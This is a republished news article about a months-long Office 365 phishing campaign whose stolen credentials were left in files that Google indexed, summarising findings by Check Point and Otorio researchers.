[ad_1]
Hackers who hit thousands of organizations around the world in a massive phishing campaign forgot to protect their loot and left Google the stolen passwords for public searches.
The phishing campaign has been running for over six months and uses dozens of domains hosting the phishing pages. It has received constant updates to make fraudulent Microsoft Office 365 sign-in requests more realistic.
Creds in plain sight
Although it relies on simple techniques, the campaign was successful in bypassing email protection filters and collecting at least 1,000 login credentials for corporate Office 365 accounts.
Researchers from cybersecurity firms Check Point and Otorio who analyzed this campaign found that hackers exposed the stolen credentials to the public internet.
In a report released today, they explain that the attackers exfiltrated the information to domains they had registered specifically for the task. Their mistake was to put the data in a publicly visible file that Google indexed.
As a result, Google could display the results of queries regarding a stolen email address or password, as shown in the screenshot below:
Researchers from both cybersecurity companies claim that the attackers also compromised legitimate WordPress servers to host the malicious PHP page delivered to victims.
“Attackers generally prefer to use compromised servers instead of their own infrastructure due to the well-known reputation of existing websites,” the researchers explain.
By processing information from around 500 entries, the researchers were able to determine that companies in the construction, energy and IT industries were the most frequent targets of these phishing attacks.
Simple and effective phishing
Attackers used several phishing email themes to trick potential victims into loading the landing page that collected their Microsoft Office 365 username and password.
The malicious emails had the target’s first name or company title in the subject line and were supposed to provide a Xerox scan notification in HTML format.
Opening the attachment loaded in the default web browser a blurry image overlaid with a fake Microsoft Office 365 login form. The username field is already filled in with the victim’s email address , which generally eliminates suspicion of connection theft.
JavaScript code running in the background checks the credentials for validity, sends them to the attacker’s drop zone server, and redirects the victim to the legitimate Office 365 login page as a distraction.
To keep the campaign undetected, the actor used compromised email accounts to deliver the scam messages. For an attack, they impersonated the German hosting provider IONOS by 1 & 1.
Although this campaign began in August, researchers found phishing emails from the same threatening actor dating from May 2020.
While Google indexing the pages of hackers where they save stolen data is not a first, it shows that not all malicious actors are skilled enough to protect their operations. Even if they are not identified, at least their actions can be thwarted.
[ad_2]
Source link